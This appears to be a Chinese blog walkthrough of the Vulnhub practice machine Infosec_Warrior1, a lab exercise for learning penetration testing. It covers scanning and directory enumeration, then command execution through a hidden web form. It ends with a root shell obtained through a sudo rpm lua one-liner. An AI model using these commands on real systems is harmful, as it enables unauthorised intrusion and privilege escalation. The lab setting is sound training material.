Vulnhub靶机Infosec_Warrior1渗透

信息收集

主机发现

arp-scan -l

Vulnhub靶机Infosec_Warrior1渗透_第1张图片

端口扫描

nmap -A -p- 192.168.160.39

Vulnhub靶机Infosec_Warrior1渗透_第2张图片

目录爆破

dirsearch -u http://192.168.160.39

命令解释:

  • dirsearch:是运行的工具的名称。

  • -u http://192.168.60.39:指定要执行目录枚举的目标 URL。确保包含http://前缀。

  • -i 200:此选项指示dirsearch仅显示返回 HTTP 状态代码 的目录200,这通常表示该目录存在并且可以访问。

    • 补充: -e php,html:此选项指定在目录枚举期间要查找的文件扩展名。

Vulnhub靶机Infosec_Warrior1渗透_第3张图片

访问80端口,只能看出是Apache站点,没有别的

Vulnhub靶机Infosec_Warrior1渗透_第4张图片

访问一下sitemap.xml

Vulnhub靶机Infosec_Warrior1渗透_第5张图片

访问192.168.80.145/index.htnl,也没啥有用的,只有一张gif格式的动态图

Vulnhub靶机Infosec_Warrior1渗透_第6张图片

查看页面源代码,发现隐藏的一个form表单,可以删除hidden='True',回车!

Vulnhub靶机Infosec_Warrior1渗透_第7张图片

因为靶机是在Centos系统上,所以在输入框中输入ls,没有得到正常的回显

Vulnhub靶机Infosec_Warrior1渗透_第8张图片

from表单换成post请求

Vulnhub靶机Infosec_Warrior1渗透_第9张图片

再次在 输入框中输入ls,成功有了 回显

Vulnhub靶机Infosec_Warrior1渗透_第10张图片

查看cmd.php,在表单中输入cat cmd.php

Vulnhub靶机Infosec_Warrior1渗透_第11张图片

使用ssh远程连接 ssh [email protected] 密码:123456789blabla

如果ssh [email protected]连接时回应的是:Unable to negotiate with 192.168.160.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ,可以使用:

ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]

Vulnhub靶机Infosec_Warrior1渗透_第12张图片

提权

连接成功后,sudo -l查看有哪些能以root身份执行的命令

Vulnhub靶机Infosec_Warrior1渗透_第13张图片

去这个网站上找提权命令:https://gtfobins.github.io/

只能找到rpm命令字的提权方式

Vulnhub靶机Infosec_Warrior1渗透_第14张图片

输入命令:

sudo rpm --eval '%{lua:os.execute("/bin/sh")}'

提权成功:

image-20230913201551023

你可能感兴趣的:(vulnhub靶机,网络安全,安全,运维)